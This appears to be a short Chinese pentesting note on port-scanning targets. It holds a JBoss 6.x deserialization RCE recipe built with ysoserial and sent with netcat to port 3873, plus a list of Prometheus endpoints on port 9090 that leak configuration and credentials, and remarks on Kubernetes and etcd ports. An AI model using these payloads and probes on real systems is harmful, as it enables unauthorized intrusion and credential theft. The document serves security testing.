闭门造车之端口扫描
- JBoss EAP/AS <= 6.* RCE
- 3873
- 生成反序列化数据包
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 'touch /tmp/pwn.txt' > /tmp/1.ser
- 增加4个字节,修改为如下红色的部分
- 发送Payload:
cat /tmp/1.ser |nc 192.168.2.1 3873
- https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf
- https://jspin.re/jboss-eap-as-6-rce-a-little-bit-beyond-xac-xed/
这里参考了漏洞百出@520师傅的文章
根据绿盟的这篇云原生服务风险测绘分析(四):Prometheus,Prometheus默认使用9090端口占比94%,所以新增的了默认的9090端口探测,Prometheus敏感接口有如下几个:
-
/api/v1/status/config- 服务相关的配置文件内容,文件格式为YAML。如果返回包有
basic_auth可以获取到密码。实际环境里面这个返回包有ACCESS_KEY但是ACCESS_SECRET打码,可以作为信息收集的渠道
- 服务相关的配置文件内容,文件格式为YAML。如果返回包有
-
/targets- 服务器状态可视化
-
/api/v1/status/buildinfo- 返回Prometheus服务的构建信息,其中包括Prometheus版本、Go版本、构建日期等敏感信息
安装之后master或者node都会开放10250端口,默认配置不可利用。
master节点默认的https端口,默认不可利用。
etcd节点,默认不可利用,拿下etcd,就拿下了k8s